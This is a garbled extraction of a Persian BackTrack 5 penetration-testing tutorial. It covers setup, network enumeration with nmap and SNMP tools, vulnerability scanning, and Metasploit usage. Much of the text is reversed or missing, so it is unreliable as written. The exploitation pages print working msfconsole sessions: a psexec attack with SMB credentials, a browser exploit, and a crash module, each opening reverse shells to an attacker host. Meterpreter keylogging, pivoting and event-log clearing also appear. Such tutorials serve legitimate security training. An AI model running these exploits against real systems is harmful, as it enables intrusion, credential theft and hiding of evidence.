learning back track 5 :persian

1Author : Alireza AzimzadehNickname : Ali MP5Editor : Ali Tahamtan

First publish : November 2013Yahoo Id: [email protected]

2013 . All Rights Reserved

2

: .

5PM.ilA

-

natmahaT ilA .

.

3

1kcarT kcaB : 1()

2 3 7

7yromeM-hsalF 01(xoB-lautriV) 41xoB-lautriV slooT-MV

51drowssaP - tooR 51

71draobyeK

81kcarT kcaB : 81sredaeH lenreK

91mocdaorB 22drac oediv ITA

52drac oediv AIDIVN 72 72sniahCyxorP

92tpyrCeurT

14)gnirehtaG noitamrofnI( : 14)noitaremune ecivreS(

44 54ksamten PMCI

74

484 15)tnirpregnif SO(

25(tnirpregnif ecivres) 45

55)yfitnedI ytilibarenluV( : 55

65susseN 85susseN[ ]

16SAVnepO 86SAVnepO

96SAVnepO[ ] 27

37)noitatiolpxE( : 37

47)stiolpxE evitcA( 57)tiolpxe evissap(

77elbatiolpsatem 98( )egatimrA

19( ELOSNOCFSM) 49( ILCFSM)ILC

79 reterPreteM 501LQSyM 701lqsergtsoP 901nwpotua_resworb

211

311noitalacsE egelivirP() :

5311 511)TES( tiklooT reenignE-laicoS

6651enO xidneppA: 651] zg.rat, 2pizb.rat, piz, rat [

651WFU 161( dnammoc)

361 361 ( )

461 661tneilC&revreS_PCHD

761

861owT xidneppA: 861

1

kcartkcaB . :

. " moc.oohay@86ruokraP_ilA

. ".

kcarT|kcaB UNG )xuniL kcartkcaB(

( ) .

. 5 . 62 40.01 utnubU

.

.

. :

. : 11

2gnirehtag noitamrofnI() (1noitacifitnedI ytilibarenluV() (2DIFR ,htooteulB1.2081 (sisylanA krowteN) (3(noitalacsE egelivirP) (4 (scisneroF latigiD) (5)PIOV(PI revO ecioV(6(gnippaM krowteN) (7(sisylanA noitacilppA beW) (8(tiklooT gnireenignE laicoS & tiolpxE) (9(sseccA gniniatniaM) (01(gnireenignE esreveR) (11

evil .

:

/sdaolnwod/gro.xunil-kcartkcab.www//:ptth:

. 46 23 :1.EDKemonG 5TB:2. emonG : 3(.tnerrot-tib .) OSI. :4. EDK EDK emonG :5

3(( )) . noitidE emoH eerf - retsaM noititraP SU esaE (1 noititrapreganam noititrap.www-moc.loot: (2

. detacollanU (3

detacollanu . BG58 . . eteled

.BG81 : 3 :

(. )

4 . ylppa (4.5TB

. 5TBDVD/DC(5.TB-eviL retnE TB (6. xtrats (7kcartkcab llatsni (8

... (9

5... (01

6 detacollanu . (11 " "

.yficeps esare :

. TB

.llatsni (21

7. 1 (

.won tratser (

: drowssap resu (51toor :resUroot :ssapxtrats :tb@toor

(( )) esare 11

. TB ((yromeM-hsalF ))

. BG21 : 1. 23TAF :2

nitooBteNU (1ten.egrofecruos.nitoobtenu.www:

8. (2.egamIksiD (3

. OSI. .... esworB OSI (4. (5

9. KO (6

.woN-toobeR (7

. BSU (8. " " 7 (9

10

USB:1) http://www.ucd.ie/itservices/itsuppo...singtruecrypt/2) https://help.ubuntu.com/community/GPGKeyOnUSBDrive3) http://www.ucl.ac.uk/isd/common/cst/...ngUSBTrueCrypt4) http://www.wikihow.com/Install-Backtrack-Live-to-USB

)) )virtual-box(( (1( :

A. virtual-box.comB. https://www.virtualbox.org/wiki/Downloads

.2( New.

11

.TB MAR (3. maR:1 . ( MV) : 2

21

.BV TB .gnittes (4

.egarots (

31

. osi (6

. KO (7

41

. trats ..........kcartkcaB (8

." " (9:xob-lautriv slooT-MV

. . TB

15

root password: :passwd

:service [name-service] [start/stop]service apache2 startservice pure-ftpd stop

netcat:netcat -tpan | grep 22

: . FTP server:

netcat -tpan | grep 21 :

update-rc.d f defaultsupdate-rc.d f ssh defaults

: :applications > backtrack > services

: :

Applications>>>Internet >>>>Wicd Network Manager

61

yart-on-- ktg-dciw yek seitreporp iF-iW

.ko noitpyrcne

71

: :

draobyek >> secnereferp >> metsys. dda stuoyal

. noitpo tuctrohs . tuoyal egnahc ot )S(yeK noitpo

. tfihs + tla:

: 2 : 2 .

etadpu teg-tpa odus .1citpanys llatsni teg-tpa .2

retnec-erawtfos llatsni teg-tpa

odus citpanys llatsni teg-tparetnec-erawtfos llatsni teg-tpa odus

81

kcartkcaB

. :

.:

mocdaorb revird (1oediv ITA revirddrac(2sredaeh lenrek (3drac AIDIVN revird (4:sredaeh lenrek

: secruos-lenrek-eraperp )1xunil/crs/rsu/ dc )2

/xunil/edulcni */detareneg/edulcni fr- pcsecruos-lenrek-eraperp )3

19

broadcom : :

1) cd /tmp/wget www.broadcom.com/docs/linux_sta/hybri-portsrc_x86_64-v5_100_82_112.tar.gz

20

2( mkdir broadcom

3(extract :tar xvfz hybrid-portsrc_x86_64-v5_100_82_112.tar.gz -C /tmp/broadcom

4( :make cleanmakemake install5) update dependencies :

depmod -a6( :

echo "blacklist " >> /etc/modprobe.d/blacklist.conf7( :

rmmod b438( :

echo "blacklist " >> /etc/modprobe.d/blacklist.conf( boot-process:

modprobe wl

21

:1( :

lspci -vnn | grep Network :

Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller [14e4:4727 ] (rev01)2(PCI-ID :

http://wireless.kernel.org/en/users/Drivers/b433( :e4:472714

:sudo apt-get remove bcmwl-kernel-sourcesudo apt-get install b43-fwcutter

.sudo apt-get install firmware-b43-installer

4(:cat /etc/modprobe.d/* | egrep 'bcm'

. ok. :

blacklist bcm43xx blackllist. :

cd /etc/modprobe.d/sudo gedit blacklist.conf

5( :blacklist bcm43xx

save.

22

broadcom:http://wireless.kernel.org/en/users/Drivers/b43http://askubuntu.com/questions/55868...reless-drivershttps://help.ubuntu.com/community/Wi...Driver/bcm43xxhttp://wiki.debian.org/bcm43xxhttp://www.linuxquestions.org/questi...u-lucid-875477http://ubuntuforums.org/showthread.php?t=915449

ATI video card:1( :

cd /tmp/2( :

http://support.amd.com/us/gpudownload/Pages/index.aspxwget http://www2.ati.com/drivers/linux/amd-driver-installer- 12-1-x86.x86_64.run

3( :sh amd-driver-installer-12-1-x86.x86_64.run

23

4( restart.5( :

apt-get install libroot-python-dev libboost-python-dev libboost1.40-all-dev cmake6( AMD APP SDK :

wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.6- lnx64.tgz

7( :mkdir AMD-APP-SDK-v2.6-lnx64

8( :tar zxvf AMD-APP-SDK-v2.6-lnx64.tgz C /tmp/AMD-APP-SDK-v2.6- lnx64

9( :cd AMD-APP-SDK-v2.6-lnx64

24

10) sh Install-AMD-APP.sh11) echo export ATISTREAMSDKROOT=/opt/AMDAPP/ >> ~/.bashrc

ssource ~/.bashrc12( CAL++ Pyrit:

cd /tmp/

svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp

cd calpp/trunk

cmake

make

make install

cd /tmp/svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_srccd pyrit_src/pyritpython setup.py buildpython setup.py install

13( OpenCL:cd /tmp/pyrit_src/cpyrit_opencl

python setup.py build

python setup.py install14( cpyrit_calpp:

cd /tmp/pyrit_source/cpyrit_calpp

vi setup.py :

VERSION = '0.4.0-dev'

25

VERSION = '0.4.1-dev'

:CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include'))

CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))

15( . .python setup.py build

python setup.py install NVIDIA video card:: 64 . 32 .

1) cd /tmp/2) wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/driv ers/NVIDIA-Linux-

x86_64-285.05.33.run

3( :chmod +x NVIDIA-Linux-x86_64-285.05.33.run4) ./NVIDIA-Linux-x86_64-285.05.33.run kernel-source-path='/usr/src/linux'

26

(cuda toolkit:wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_ubuntu11.04.run6) chmod +x cudatoolkit_4.1.28_linux_64_ubuntu11.04.run

( :./cudatoolkit_4.1.28_linux_64_ubuntu11.04.run

8( :echo PATH=$PATH:/opt/cuda/bin >> ~/.bashrcecho LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/cuda/lib >> ~/.bashrcecho export PATH >> ~/.bashrcecho export LD_LIBRARY_PATH >> ~/.bashrc9) source ~/.bashrcldconfig

(apt-get install libssl-dev python-dev python-scapy11)a. svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src

cd pyrit_src/pyritpython setup.py buildpython setup.py install

b. cd /tmp/pyrit_src/cpyrit_cudapython setup.py buildpython setup.py install

12( :nvcc V

pyrit benchmark

72

: : (1

etadpu teg-tpa: (2

edargpu teg-tpa: (3

edargpu-tsid teg-tpa3diuqs llatsni teg-tpa )4

: evomer 3diuqs f- d.cr-etadpu

:sniahCyxorP :miv (1

fnoc.sniahcyxorp/cte/ miv: ( #)

niahc_cimanyd#:

niahc_cimanyd

82

: (2

29

3( :proxyresolv www.targethost.comproxyresolv www.yahoo.com

TrueCrypt:1( :

Applications | BackTrack | Forensics | Digital Anti Forensics | install truecrypt

2( .3(

30

4(create volume

5(

13

(6

: (7

32

8(

9(

33

(01

: emulov (11

34

12(

13(

14(

35

15(

16(

17(

63

: emulov ym emulov(81

(91

37

20(

21(

38

22(

23(

93

: tnuomsid emulov (42

40

: .

http://pkgs.org/ubuntu-10.04/ubuntu-..._i386.deb.htmlhttp://ubuntuguide.net/install-nvidi...tu-lucid-10-04http://www.ubuntugeek.com/howto-inst...ucid-lynx.htmlhttp://ldt-clan.com/forum/threads/26...butnu-10-4-LTShttp://www.truecrypt.org/http://pkgs.org/ubuntu-10.04/ubuntu-..._i386.deb.htmlhttp://pkgs.org/ubuntu-10.04/ubuntu-..._i386.deb.html

: 32 64 :http://tjwallas.weebly.com/5/post/20...on-ubuntu.html

14

gnirehtaG noitamrofnI:

.: noitaremune ecivreS

noitaremune:.

noitaremune PMNS ,noitaremune SND:noitaremune SND

pi eman retupmoc emanresu . ... sserdda

: /munesnd/snd/noitaremune/tsetnep/ dc

: moc.tegrat mune-- lp.munesnd/.

: h- lp.munesnd/. pleh-- lp.munesnd/.

:

24

: . [rebmun sdaerht]--spukool r-SIOHW d-o-SIOHW w-

:noitaremune PMNS. PMNS . PMNS : (1

/munepmns/pmns/noitaremune/tsetnep/ dc: (2

txt.swodniw cilbup 002.01.861.291 lp.munepmns lrep

43

: SNMP 192.168.10.200 :Installed softwareUsersUptime. Hostname. Discs

:Perl snmpenum.pl [ip address to attack] [community] [config file]

:snmpwalk enumeration : windows host) ( .1( :

snmpwalk -c public 192.168.10.200 -v 2c2( :

snmpwalk -c public 192.168.10.200 -v 1 | grep hrSWInstalledName:

HOST-RESOURCES-MIB::hrSWInstalledName.1 = STRING: "VMware Tools"HOST-RESOURCES-MIB::hrSWInstalledName.2 = STRING: "WebFldrs""

3( TCP:snmpwalk -c public 192.168.10.200 -v 1 | grep tcpConnState cut -d"." -f6 | sort nu|

:212580443...

44

: SNMPcheck enumeration SNMP protocols .

1. :cd /pentest/enumeration/snmp/snmpcheck/

2. :perl snmpcheck.pl -t 192.168.10.200

: fierce enumeration ip address hostname .

1( :cd /pentest/enumeration/dns/fierce/

2( :perl fierce.pl -dns target.com

3( word-list :perl fierce.pl -dns target.com -wordlist hosts.txt -file /tmp/output.txt

:smtp-user enumeration SMPT-server .

:smtp-user-enum.pl -M VRFY -U /tmp/users.txt -t 192.168.10.200

:Determining the network range ip .

54

:yrtimd. niamod-bus pi

: tluser-yrtimd/potkseD/toor/ o- moc.tsohtegrat bpsnw- yrtimd

: . pukool SIOHW bpsnw-

. o-

:ksamten PMCI moc.tsohtegrat s- ksamten

:ypacs ( )

:

46

http://www.arppoisoning.com/demonstrating-an-arp-poisoning-attack-2/http://www.secdev.org/projects/scapy/demo.htmlhttp://packetlife.net/blog/2011/may/23/introduction-scapy

1. :scapy

2. :ans,unans=sr(IP(dst="www.targethost.com/30", ttl=(1,6))/TCP())

3. :ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) )

216.27.130.165 216.27.130.164 216.27.130.163 216.27.130.162192.168.10.1 192.168.10.1 192.168.10.1 192.168.10.1 151.37.219.254 51.37.219.254 51.37.219.254 51.37.219.254 2223.243.4.254 223.243.4.254 223.243.4.254 223.243.4.254 3223.243.2.6 223.243.2.6 223.243.2.6 223.243.2.6 4

192.251.251.80 192.251.254.1 192.251.251.80 192.251.254.1 5

74

:etuorecart : .1

-kcartkcab.www","moc.elgoog.www"[(etuorecart=snanu,ser)2-=yrter ,02=lttxam,]344,08[=tropd,]"moc.tsohtegrat.www","gro.xunil

. 02 )evil ot emit(LTT 34408 . 02 ltt : : .2

)(hparg.ser

: .3)"gvs.hparg/pmt/ >"=tegrat(hparg.ser

: .4)(tixe

:senihcam evitca gniyfitnedI pI .

:pamn (1261.031.72.612 Ps- pamn

48

:Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-27 23:30 CDTNmap scan report for test-target.net (216.27.130.162)Host is up (0.00058s latency).Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds

2( nping: nmap .

nping --echo-client "public" echo.nmap.org

3( hex :nping -tcp -p 445 data AF56A43D 216.27.130.162

Finding open ports: .

:nmap 192.168.56.102

94

: 201.65.861.291 0001-1 p- pamn

15

. ISpamn :2:gnitnirpregnif metsys gnitarepO

. trop nepoenihcam evitcasserdda pi .

:(SO tceteD) 201.65.861.291 O- pamn

. :

52

Service fingerprinting: .

1( :nmap -sV 192.168.10.200

:Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-28 05:10 CDTInteresting ports on 192.168.10.200:Not shown: 1665 closed ports

53

PORT STATE SERVICE VERSION21/tcp open ftp Microsoft ftpd 5.025/tcp open smtp Microsoft ESMTP 5.0.2195.671380/tcp open http Microsoft IIS webserver 5.0119/tcp open nntp Microsoft NNTP Service 5.0.2195.6702 (posting ok)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn443/tcp open https?445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds1025/tcp open mstask Microsoft mstask1026/tcp open msrpc Microsoft Windows RPC1027/tcp open msrpc Microsoft Windows RPC1755/tcp open wms?3372/tcp open msdtc?6666/tcp open nsunicast Microsoft Windows Media Unicast Service (nsum.exe)Nmap finished: 1 IP address (1 host up) scanned in 63.311 seconds

2( Amap: .

:amap -bq 192.168.10.200 200-300

:amap v5.4 (www.thc.org/thc-amap) started at 2012-03-28 06:05:30 - MAPPING modeProtocol on 127.0.0.1:212/tcp matches ssh - banner: SSH-2.0- OpenSSH_3.9p1\nProtocol on 127.0.0.1:212/tcp matches ssh-openssh - banner: SSH-2.0-OpenSSH_3.9p1\n

54

amap v5.0 finished at 2005-07-14 23:02:11

:http://www.cyberciti.biz/networking/nmap-command-examples-tutorials/http://nmap.org/book/vscan-examples.htmlhttp://nmap.org/book/install.htmlhttp://www.youtube.com/watch?v=Bfla9NQrJAchttp://www.youtube.com/watch?v=ZTbLyZZbilAhttp://www.youtube.com/watch?v=RAOHmrtaimU

:http://linux.die.net/man/1/nmap

:http://nmap.org/download.html

1 : :Threat assessment with Maltego. :

https://www.paterva.com/web6/community :

Applications |BackTrack |Information Gathering |Web Application Analysis |Open SourceAnalysis |Maltego

2 : .with casefileMapping the network. :

Applications | BackTrack | Reporting Tools | Evidence Management | casefile.

55

noitacifitnedI ytilibarenluV:

. . " "

. .

. . SAVnepOsusseN 2

ytilibarenluV: """"" "

. rennacS ytilibarenluV

ytilibarenluV. . rennacS

evitisoP eslaF . luv ! luVrennacS luV . :

seitilibarenluv xuniL )1seitilibarenluv swodniW )2skcehc ytiruces lacoL )3seitilibarenluv ecivres krowteN )4

56

Installing, configuring, and starting Nessus: nessus:

system-operating-your-http://www.tenable.com/products/nessus/select1. :

apt-get install nessus2. :

/opt/nessus3. :

/etc/init.d/nessusd start4. nessus:

/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX: nessus X .

.http://plugins.nessus. Org

5. :/opt/nessus/sbin/nessus-adduser

:Applications | BackTrack | Vulnerability Assessment | Vulnerability Scanners | Nessus | nessususer add

75

: .6trats dsussen/d.tini/cte/

58

7. :https://127.0.0.1:8834

:Nessusfinding [network, local, Linux-specific, Windows-specific] vulnerabilities1( Policies.2( add policy.

95

: lareneg( bat) (3. seitilibarenluV lacoL (

: ytilibisiv (. : derahs(a. : etavirp(b

.txen (. snigulp (

.timbus (:snacs (

06

: (

:nacs epyt. : won nur.1. :deludehcS.2. :etalpmeT.3

:tegrat nacs. nacs hcnul pI

16

. :1=ofni =wol=muidem =hgiH: snigulp: :2.

. rennacs luv rennacS IGC: 3. susseN aniteR: 4

:SAVnepO gnitrats dna ,gnirugifnoc ,gnillatsnI:SAVnepo

lmth.daolnwod/gro.savnepo.www//:ptth: (1

/savnepo/csim/tsetnep/ dc: (2

treckm-savnepo. retne (3

: (4cnys-tvn-savnepo

62

5( :openvas-mkcert-client -n om -i

openvasmd --rebuild

6(:openvassd

: .7(:

openvasmd --rebuildopenvasmd --backup

8( :openvasad -c 'add_user' -n openvasadmin -r admin

openvasad -c 'add_user' -n openvasadmin -r Admin

36

: (9resudda-savnepo

: (01. ( .( . ( . D+lrtc ( . Y (

: (111.0.0.721 a- 0939 p- dmsavnepo3939 p- 1.0.0.721 a- dasavnepo2939 p- 1.0.0.721=netsil-- ylno-ptth-- dasg

. 31 21 : : (21

2939:1.0.0.721//:ptth

64

13( openVAS .sh. openvas.sh:

( create document empty file: ( . ( :

#!/bin/bashopenvas-nvt-syncopenvassdopenvasmd --rebuildopenvasmd --backupopenvasmd -p 9390 -a 127.0.0.1openvasad -a 127.0.0.1 -p 9393

56

2939 p- 1.0.0.721=netsil-- ylno-ptth-- dasg. (41:

potkseD/toor dchs.savnepo 777 domhc

: (51hs.savnepo/.

. SAVnepo :

: (1

(2

66

3(

4(

67

5(

6(

96

seitilibarenluv ]xuniL ,swodniW ,krowten ,lacol[ gnidnif SAVnepO:: .1

2939:1.0.0.721//:ptth

.noitarugifnoc gifnoc nacS .2

. .3:esab .4

. : ..,citats ,ytpme( . :tsaf dna lluF(

.gifnoc nacs etaerc .5

. lacol . lacol f+lrtc .6

07

. s'TVN lla tceleS .7

.gifnoc evas .8: stegrat noitarugifnoc .9

. .01: .11

02.1.861.291 )a04.1.861.291,02.1.861.291 )b09-01.1.861.291 )c

17

.tegrat etaerc .21 ksat wen . tnemeganam nacs: noitarugifnoc .31

: .ksat ( . ( . ( . ( .ksat etaerc (

.ksats tnemeganam nacs .41. ( yalp) .51

72

:1. Scan management tasks.2. .3. " " .

:http://www.openvas.org/setup-and-start.htmlhttp://www.openvas.org/install-packages-v5.html#ubuntuhttp://packages.ubuntu.com/search?ke...ll&section=allhttp://www.back-door.webs.com/Backtr...0Tutorial.htmlhttp://www.openvas.orghttp://www.backtrack-linux.org/wiki/index.php/OpenVashttp://www.irongeek.com/i.php?page=videos/nessushttp://www.tenable.com/blog/enabling-nessus-on-backtrack-5-the-official-guidehttps://wiki.archlinux.org/index.php/nessushttp://www.admin-magazine.com/Articles/Pen-Test-Tipshttp://www.securityfocus.com/tools/category/11

37

noitatiolpxE:

( ) . tiolpsatem .

. ...(. ) :ytilibarenluv

: ) :tiolpxe...( . : ) :daolyap

.( daolyap . :daolyaP:

,noitcejni LLD ,noitucexe dnammoc ,llehs evitcaretni na ,noitucexe elif ,noitcejni CNV edulcnireterpreteM eht , resu a gnidda

:daolyap : 3

:elgnis exe.lac .

.:sregatS

. ( )

74

Stages: ) ( stagers .

:meterpreter, vnc injection..... payload :

. :InlineStagedMeterpreterPassiveXNoNXOrdIPv6Reflective DLL injection

Active Exploits : . :

. ... . :

msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 192.168.1.100RHOST => 192.168.1.100msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcpPAYLOAD => windows/shell/reverse_tcpmsf exploit(psexec) > set LHOST 192.168.1.5LHOST => 192.168.1.5msf exploit(psexec) > set LPORT 4444LPORT => 4444msf exploit(psexec) > set SMBUSER victimSMBUSER => victimmsf exploit(psexec) > set SMBPASS s3cr3tSMBPASS => s3cr3tmsf exploit(psexec) > exploit[*] Connecting to the server...[*] Started reverse handler[*] Authenticating as user 'victim'...[*] Uploading payload...

75

[*] Created \hikmEeEM.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl]...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...[*] Closing service handle...[*] Opening service..............[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system3>

passive exploit: .FTP, Web Browser....

:ssessions i . "

" . web app side attack.

PAYLOAD => windows/shell/reverse_tcpmsf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.101LHOST => 192.168.1.101msf exploit(ani_loadimage_chunksize) > set LPORT 4444LPORT => 4444msf exploit(ani_loadimage_chunksize) > exploit[*] Exploit running as background job.

46[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.1.101:8080/[*] Server started.

msf exploit(ani_loadimage_chunksize) >[*] Attempting to exploit ani_loadimage_chunksize

76

[*] Sending HTML page to 192.168.1.104:1077...[*] Attempting to exploit ani_loadimage_chunksize[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to

192.168.1.104:1077...[*] Sending stage (240 bytes)[*] Command shell session 2 opened (192.168.1.101:4444 -> 192.168.1.104:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2[*] Starting interaction with 2......................

exploitation:Applications | BackTrack | Exploitation Tools

Network Exploitation Tools :Cisco AttacksFast-TrackMetasploit FrameworkSAP ExploitationWeb Exploitation Tools :oscannerfimapasp-auditoysslstripwebsploit

77

Database Exploitation Tools :MSSQL Exploitation ToolsMySQL Exploitation ToolsOracle Exploitation ToolsWireless Exploitation Tools :BlueTooth ExploitationGSM ExploitationWLAN ExploitationSocial Engineering Tools :BeEF XSS FrameworkHoneyPotsSocial Engineering ToolkitPhysical Exploitation :ArduinoKautilyau3-pwnvideoJAKOpen Source Exploitation :Exploit-DBOnline Archives

Installing and configuring Metasploitable: )) :((

: ( . (8-10 GB virtual-pc).( ( 7zipwinrar WinZip.

:http://sourceforge.net/projects/metasploitable/files/

1( :

87

.wen (2.txen (3

: (4

97

: MAR (5.BM215

: (6

08

: (7

.etaerc (

:trats (9

18

((:3R-5TB )) . 001%

buhtig etadpufsm: tb : etavirp . .

. : . . 2

82

1( :apt-get update

83

2( :sudo apt-get install git-core -ysudo apt-get install curl -yapt-get install libpq-desudo apt-get install build-essential openssl libreadline6 libreadline6-dev curl git-core zlib1gzlib1g-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt-dev autoconf libc6-devlibgdbm-dev ncurses-dev automake libtool bison subversion pkg-config libffi-devsudo apt-get -y install \build-essential zlib1g zlib1g-dev \libxml2 libxml2-dev libxslt-dev locate \libreadline6-dev libcurl4-openssl-dev git-core \libssl-dev libyaml-dev openssl autoconf libtool \ncurses-dev bison curl wget postgresql \postgresql-contrib libpq-dev \libapr1 libaprutil1 libsvn1 \libpcap-dev

3( . : .

( 200MB :rm -rf $HOME/metasploitgit clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit

5( :git clone git://github.com/sstephenson/rbenv.git ~/.rbenv

84

echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.profileecho 'eval "$(rbenv init -)"' >> ~/.profile

84


84


58

: (6/vnebr./~ dcsnigulp ridkmsnigulp/vnebr./~ dctig.dliub-ybur/nosnehpetss/moc.buhtig//:tig enolc tig

. erawMV. :.

. ybur .ybur3.1 (701: 02 : 3.9.1

: 583p-3.9.1 llatsni vnebr

: : gro.smegybur.www583p-3.9.1 labolg vnebrhsaher vnebrv ybur

68

: (8reldnub llatsni megv- sliarsliar llatsni megv- sliar

. 3fsm tiolpsatem toor (9: (01

tiolpsatem/tpo/ dc. ecalper 3fsm (11: 01 (21

:)3fsm/tiolpsatem/tpo/ dc(llatsni eldnub && eldnub llatsni meg

: (31llatsni eldnub && eldnub llatsni meg

meg . meg21 11 .

gro.smegybur.www: meg

meg-eman llatsni meg:

1_lrig_itokin llatsni meg: (41

3fsm/tiolpsatem/tpo/ dc:(51

llatsni eldnub: (61

87

gem update

17( :Msfupdate

87

gem update

17( :Msfupdate

87

gem update

17( :Msfupdate

88

18( metasploit :./msfconsole

./msfconsole -L

88


./msfconsole -L

88


./msfconsole -L

98

tiolpsateM rof loot tnemeganam lacihparg eht egatimrA gniretsaM: egatimra atem

. ( )enil dnammoc egatimra atem

. atem . liaf :egatimra

:

98




:

98




:

19

:

. A:. B:tiolpsatem noisses-elosnoc reterpretm. C:

:)ELOSNOCFSM( elosnoC tiolpsateM eht gniretsaMelosnoc egatimra

. :

( . ( .tiolpsatem ( .....

29

: . .1

elosnocfsm: :

3fsm/tiolpsatem/tpo/ dc. elosnocfsm

: >fsm

:tiolpsatem .2. : pleh. . : esu. noitpO tes:

. tiolpxe :eludom tiolpxe-non. : nur

. : hcraes(. ) : tixe

: : xunil hcraes >fsm

39

: xunil_rtj/eszylana/yrailixua esu

. rekcarc drowssap xuniL

: snoitpo wohs

.

49

: nhoj/sdrowssap/tsetnep/ HTAP_NHOJ tes

. :

tiolpxe

. daolyap : 1 . daolyap tes : 2

:)ILCFSM( ILC tiolpsateM eht gniretsaM ILCFSM ( ecafretni)

. . /

. :1. elosnocfsm :2

:ILCFSM :

ilcfsm.ILCFSM

59

: h ilcfsm

:A A samx/nacstrop/rennacs/yrailixua ilcfsm/3fsm/tiolpsatem/tpo/

. A

69

:S S samx/nacstrop/rennacs/yrailixua ilcfsm/3fsm/tiolpsatem/tpo/

. . . S

:O O samx/nacstrop/rennacs/yrailixua ilcfsm/3fsm/tiolpsatem/tpo/

. tiolpxe snoitpo O

79

:E E samx/nacstrop/rennacs/yrailixua ilcfsm/3fsm/tiolpsatem/tpo/

. E

:reterpreteM gniretsaM .

. :

. pleh:. fsm noisses : dnuorgkcab :daolnwod

. llehs:. noisses : i- noisses

. trats_nacsyek:. pmud_nacsyek:. pots_nacsyek:

. :led sp:

. gol : varaelc3556 3536 llik :

98

1.:back .

:msf auxiliary(ms09_001_write) > backmsf >

2.check: exploit .

msf exploit(ms04_045_wins) > show optionsName Current Setting Required Description-------------RHOST 192.168.1.114 yes The target addressRPORT 42 yes The target portExploit target:Id Name------------0 Windows 2000 Englishmsf exploit(ms04_045_wins) > check[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)

. ) ( .3.connect:

netcattelnet .msf > connect 192.168.1.1 23[*] Connected to 192.168.1.1:23!DD-WRT v24 std (c) 2008 NewMedia-NET GmbHRelease: 07/27/08 (SVN revision: 10011)

-s :msf > connect -s www.metasploit.com:443[*] Connected to www.metasploit.com:443GET / HTTP/1.0HTTP/1.1 302 FoundDate: Sat, 25 Jul 2009 05:03:42 GMT

99

Server: Apache/2.2.11Location: http://www.metasploit.org/

4.exploitrun: exploit auxiliary module, run.

msf auxiliary(ms09_001_write) > runAttempting to crash the remote host...datalenlow=65535 dataoffset=65535 fillersize=72rescuedatalenlow=55535 dataoffset=65535 fillersize=72rescuedatalenlow=45535 dataoffset=65535 fillersize=72rescuedatalenlow=35535 dataoffset=65535 fillersize=72rescuedatalenlow=25535 dataoffset=65535 fillersize=72rescue35...snip...

5.irb: .

framework .msf > irb[*] Starting IRB shell...

>> puts "Hello, metasploit!"Hello, metasploit!

>> Framework::Version=> "3.3-dev"

>> framework.modules.keys.length=>744

6.: jobs msf :

100

7.:-K : job ).(-k : job ). job.(-i : job .

load: ..

msf > loadUsage: load [var=val var =val ...]var=val

val :msf > load pcap_log[*] Successfully loaded plugin: pcap_log

8.unload: .

msf > load pcap_log[*] Successfully loaded plugin: pcap_log

msf > unload pcap_logUnloading plugin pcap_log...unloaded.

9.route:meterpreter route -h :

add [subnet] [netmask] [gateway]delete [subnet] [netmask] [gateway]list

pivoting . .

msf exploit(ms08_067_netapi) > route

Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]Route traffic destined to a given subnet through a supplied session.The default comm is Local.

101

:msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 2msf exploit(ms08_067_netapi) > route printActive Routing Table====================Subnet Netmask Gateway------ ------- ------- -------192.168.1.0 255.255.255.0 Session 2

10.info::

author and licensing informationVulnerability (ie: CVE, BID, etc)

:msf > info dos/windows/smb/ms09_001_write

:Name: Microsoft SRV.SYS WriteAndX Invalid DataOffsetVersion: 6890License: Metasploit Framework License (BSD)Provided by:j.v.vallejo

11.set / unset:Payload .

msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1RHOST => 192.168.1.1msf auxiliary(ms09_001_write) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------RHOST 192.168.1.1 yes The target addressRPORT 445 yes Set the SMB service port

Unset:msf > set RHOSTS 192.168.1.0/24RHOSTS => 192.168.1.0/24msf > set THREADS 50

102

THREADS => 50msf > set

:Global======Name Value---- -----RHOSTS 192.168.1.0/24THREADS 50msf > unset THREADS

:Unsetting THREADS...msf > unset all

:Flushing datastore...msf > set

:Global======No entries in data store.

12.sessions: meterpreter VNCshells... .

sessions -i .:

msf exploit(3proxy) > sessions -i 1[*] Starting interaction with 1...

13.search::

msf > search ms09-001[*] Searching loaded modules for pattern 'ms09-001'...40Auxiliary=========

103

Name Description---- ---- ----dos/windows/smb/ms09_001_write Microsoft SRV.SYS WriteAndX Invalid DataOffset

14.show: .auxiliaryexploit ....

